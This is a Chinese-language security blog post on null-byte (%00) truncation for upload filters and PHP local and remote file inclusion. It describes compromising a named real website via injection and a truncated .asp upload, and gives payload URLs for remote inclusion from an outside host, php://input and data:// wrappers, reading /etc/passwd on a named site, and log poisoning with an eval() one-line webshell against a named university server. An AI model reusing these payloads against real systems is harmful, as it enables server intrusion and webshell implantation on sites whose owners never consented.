Warning: file_exists() expects parameter 1 to be a valid path, string given in /usr/share/nginx/html/wp-includes/template.php on line 634

Warning: file_exists() expects parameter 1 to be a valid path, string given in /usr/share/nginx/html/wp-includes/template.php on line 637

Warning: file_exists() expects parameter 1 to be a valid path, string given in /usr/share/nginx/html/wp-includes/template.php on line 640
文件上传之\00截断与文件包含之%00截断 文件包含漏洞详解 – jinglingshu的博客
最新消息:

文件上传之\00截断与文件包含之%00截断 文件包含漏洞详解

技术 admin 7493浏览 0评论

首先要明确\00截断与%00截断的关系:00截断就是将上传文件的文件名或路径名中使用ascii码值为0的字符进行截断来达到突破上传限制的目的,而%00一般用在URL中用于截断url来进行文件包含。两者之间的关系是:%00是ascii值为0字符的url编码形式,两者原理其实是一样的。

一、\00的路径截断

以网站http://www.hongkonggift.com为例,该网站存在注入,通过注入获取管理员口令并进入后台,在http://www.hongkonggift.com/admin/banner_detail.asp?uid=3处可上传文件。

20130725152336

结果上传后缀为.asp/asa等后缀都不成功,上传jpg文件是可以的。通过空格方式.asp .jpg也不行。下面使用截断。

(1)通过burp sulte抓包。修改文件名截断即可。为了说明\00与%00的关系,有两种修改方法。第一种 :用\00截断。即在.asp后面加个空格,然后在hex中将空格的20变为00.

20130725165941

20130725170047

20130725170344

第二种是,将文件名名为3.asp%00.jpg,然后使用burp将%00进行url解码(实际上这样获得的文件名与上面将20变为00是一样的)。

20130725172618

 

二、文件包含漏洞

利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?

其实以前就有人提到过用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串,详见:http://cloie.it580.com/?p=51

文里提到只可以在WIN下利用,其实部分Linux主机下也可以,只是/的数量要更多些(要使文件路径名长度大于4096字节),看看下面的代码片断:

<?php
$a=”;
for($i=0;$i<=4071;$i++) {
$a .= ‘/’;
}
$a = ‘test.txt’.$a;                //完整的路径为/var/www/test/test.txt
require_once($a.’.php’);
?>
在Linux环境下测试,你会发现’.php’被截断了,成功的包含了test.txt:)

 

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

<?php 
$query=$_GET['p']; 

include($query); 
?>

poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

php包含那点事情

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

2.截断本地包含

require_once($a.'.php');
include($a.".php");
//等等类似此包含的函数..

WINDOWS下还有特别用处:

\.或者./或者\或者/截断 (WINDOWS都可以使用.)

波波虎

截断的原理

Linux包含截断例子 (Linux .//可以.)

%00截断包含,有gpc=off和php版本限制

poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3.远程包含

allow_url_include=On就是远程文件包含了,为off那就只能本地包含了.

测试case:

<?php 
$query=$_GET['p'];
include($query.".php"); 
?>

连接:

http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

爆错了:

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in

/var/www/htdocs/explame.php on line 3
include($query.".php");

代码的缘故,在后面加上了”.php“,导致yeah.txt变成了yeah.txt.php.

这里我们不需要截断啦,来个360计之—-将计就计.

在www.axxer.com创建个yeah.php文件;

然后http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah,自动在后面加

.php;多么爱。。。。

远程包含小连接

我们还可以用php自带协议来利用:

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。

http://www.schnelltest24.de/index.php?page=/etc/passwd
//这个没有截断,我们尝试下用协议看看.

php包含那点事情

利用协议然后POST发送利用代码,哈哈;多么有爱~~~~.

4.日记包含高级利用

Linux包含截断例子

此连接已经透露出技巧了呢,连接思路简单说下:

(1)访问带有一句话的错误连接(http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx…),此连接将记录到error.log错误记录文件中.

(2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././……….)

一先限制以及突破:

类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php

这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

可以使用:伪造没有Connection HTTP标头的请求包

一点连接:内容1

内容2

5.其他高级利用

(1)包含/proc/self/environ环境变量:

这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样

php包含那点事情

利用(文章中第四点有详细介绍了.)

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(2) (3)点介绍

phpinfo爆破包含pdf

转自:http://zone.wooyun.org/content/2196

 

 

转载请注明:jinglingshu的博客 » 文件上传之\00截断与文件包含之%00截断 文件包含漏洞详解


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (2)

  1. 注意:用%00进行截断在gpc为off时才会有效。
    admin6年前 (2013-08-05)回复